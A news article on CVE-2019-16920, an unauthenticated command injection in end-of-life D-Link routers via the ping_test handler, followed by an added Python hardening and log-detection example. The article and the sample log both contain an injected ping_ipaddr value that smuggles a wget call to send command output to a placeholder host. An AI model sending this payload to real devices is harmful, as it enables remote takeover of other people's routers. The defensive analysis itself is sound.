Remotely exploitable vulnerability in D-Link routers

A dangerous vulnerability (CVE-2019-16920) has been identified in D-Link wireless routers that allows remote code execution on the device by sending a specially crafted request to the "ping_test" handler, which is reachable without authentication.

Interestingly, according to the firmware developers, the "ping_test" call should only be performed after authentication, but in practice it is invoked in any case, regardless of whether the user is logged into the web interface. Specifically, when the apply_sec.cgi script is accessed with the "action=ping_test" parameter, the script redirects to the login page, yet at the same time it performs the action associated with ping_test. To achieve code execution, a second vulnerability in ping_test itself was used: it invokes the ping utility without properly checking that the IP address supplied for testing is valid. For example, to call the wget utility and send the result of the "echo 1234" command to an external host, it is enough to specify the parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
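The two defects described above (an action dispatched before the authentication check, and a ping target passed to a shell without validation) are easiest to see next to a hardened version. The following Python is an added illustration written for this article; it is not D-Link firmware code, and the function names, the request dispatcher and the access-log lines are constructed. It shows strict IP-literal validation, an argv list instead of a shell string, a dispatcher that redirects unauthenticated requests without executing anything, and a log scan that flags requests of the shape described here, which is useful where no fixed firmware exists.

```python
"""Added illustration of the defects behind CVE-2019-16920 and a log-based detection.
Not D-Link code; all names, the dispatcher and the log lines below are constructed."""
import ipaddress
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit


def validate_ping_target(value: str) -> Optional[str]:
    """Return the canonical IP literal if value is exactly one IPv4/IPv6 address, else None.
    A newline, space or shell metacharacter makes the parse fail, so an injected
    second command such as '127.0.0.1\\nwget ...' is rejected as a whole."""
    try:
        return str(ipaddress.ip_address(value.strip()))
    except ValueError:
        return None


def build_ping_command(value: str) -> Optional[List[str]]:
    """Build ping's argv from a validated address. An argv list (never a shell
    string) is the second layer: even a bad value cannot become a second command."""
    target = validate_ping_target(value)
    if target is None:
        return None
    return ["ping", "-c", "3", target]


def handle_apply_sec(query: str, authenticated: bool) -> dict:
    """Hypothetical hardened dispatcher for an apply_sec.cgi-style request.
    Unlike the bug described in the article, an unauthenticated request is
    redirected to the login page AND nothing else runs; the action is dispatched
    only after the check. The command is returned, not executed, so the function
    can be exercised offline."""
    if not authenticated:
        return {"status": 302, "location": "/login.html", "executed": None}
    params = parse_qs(query, keep_blank_values=True)
    action = params.get("action", [""])[0]
    if action == "ping_test":
        cmd = build_ping_command(params.get("ping_ipaddr", [""])[0])
        if cmd is None:
            return {"status": 400, "executed": None}
        return {"status": 200, "executed": cmd}
    return {"status": 400, "executed": None}


# Matches the quoted request line of a common-log-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def is_suspicious_request(log_line: str) -> bool:
    """True if the logged request hits apply_sec.cgi with action=ping_test and a
    ping_ipaddr that is not a plain IP address (the shape this article describes)."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    parts = urlsplit(m.group("target"))
    if not parts.path.endswith("apply_sec.cgi"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    if "ping_test" not in params.get("action", []):
        return False
    # parse_qs already decodes %0a, %20 etc., so validation sees the real characters.
    return any(validate_ping_target(v) is None for v in params.get("ping_ipaddr", []))


# Constructed access-log lines (common log format), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2019:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Oct/2019:10:00:02 +0000] "GET /apply_sec.cgi?action=ping_test&ping_ipaddr=8.8.8.8 HTTP/1.1" 302 0',
    '198.51.100.7 - - [01/Oct/2019:10:00:03 +0000] "GET /apply_sec.cgi?action=ping_test&ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http://test.test/?$(echo%201234) HTTP/1.1" 302 0',
]


def scan_access_log(lines: List[str]) -> List[str]:
    """Return the client IPs of the log lines that match the exploit shape."""
    return [line.split(" ", 1)[0] for line in lines if is_suspicious_request(line)]


if __name__ == "__main__":
    print("suspicious clients:", scan_access_log(SAMPLE_LOG))
```

The detection deliberately keys on the decoded parameter rather than on a list of encoded byte sequences: a URL-decoded value that is not a single IP literal is suspicious whatever encoding trick was used, and a legitimate ping test (a bare address) is never flagged.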


The presence of the vulnerability has been officially confirmed in the following models:

  • DIR-655 with firmware 3.02b05 or later;
  • DIR-866L with firmware 1.03b04 or later;
  • DIR-1565 with firmware 1.01 or later;
  • DIR-652 (no information on the affected firmware versions has been provided)

The support period for these models has already ended, so D-Link has stated that it will not release updates for them to fix the vulnerability, does not recommend using them, and advises replacing them with newer devices. As a workaround, access to the web interface can be restricted to trusted IP addresses only.

It later became known that the vulnerability also affects the DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 and DIR-825 models, for which updates are planned but no release date is known.

Source: opennet.ru
